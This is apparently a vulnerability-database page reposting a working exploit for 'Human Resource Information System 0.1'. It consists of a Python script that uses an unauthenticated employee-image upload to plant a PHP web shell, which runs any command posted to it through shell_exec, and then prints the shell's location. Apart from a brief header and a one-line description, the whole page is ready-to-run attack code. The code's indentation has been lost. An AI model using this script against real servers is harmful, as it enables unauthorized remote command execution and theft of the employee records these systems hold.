Friday, May 7, 2021

Human Resource Information System 0.1 Remote Code Execution (Unauthenticated)

# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86

############################################################################################################

# Description:
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

############################################################################################################

# Proof of concept:

#!/usr/bin/python3

import requests
import sys
from bs4 import BeautifulSoup

def find_shell(domain):
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
soup = BeautifulSoup(req_2.content , "html.parser")
imgs = soup.find_all("img")
for i in imgs:
src = i['src']
if ("shell.php" in src):
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
break
else:
continue

def upload_file(domain):

print("\n [!] Uploading Shell . . .")
payload = """
<!DOCTYPE html>
<html>
<head>
<title> Shell </title>
</head>
<body>
<form action="#" method="post">
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
<br><br>
<input type="submit" name="submit" value="execute">
</form>
<?php
$cmd = $_POST['cmd'];
$result = shell_exec($cmd);
echo "<pre>{$result}</pre>";

?>
</body>
</html>
"""

h = {
"Content-Type" : "multipart/form-data"
}

f = {'employee_image':('shell.php',payload,
'application/x-php', {'Content-Disposition': 'form-data'}
)
}
d = {
"emplo" : "",
"employee_companyid" : "test",
"employee_firstname" : "test",
"employee_lastname" : "test",
"employee_middlename" : "test",
"branches_datefrom" : "0011-11-11",
"branches_recentdate" : "2222-11-11",
"employee_position" : "test",
"employee_contact" : "23123132132",
"employee_sss" : "test",
"employee_tin" : "test",
"employee_hdmf_pagibig" : "test",
"employee_gsis" : "test"
}
url = domain + "/Admin_Dashboard/process/addemployee_process.php"
req = requests.post(url , data=d , files = f)
if req.status_code == 200:
if ("Insert Successfully" in req.text):
print("\n [!] Shell uploaded succefully\n")
find_shell(domain)

else:
print("Exploit Failed 1")

def main():
if len(sys.argv) != 2:
print('[!] usage: %s <target url> ' % sys.argv[0])
print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
sys.exit(-1)

print("<><><><><><><><><><><><><><><><><><><><><><><><>")
print("<> Human Resource Information System <>")
print("<> Shell Uploader <>")
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
target_domain = sys.argv[1]
upload_file(target_domain)

if __name__ == "__main__":
main()
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated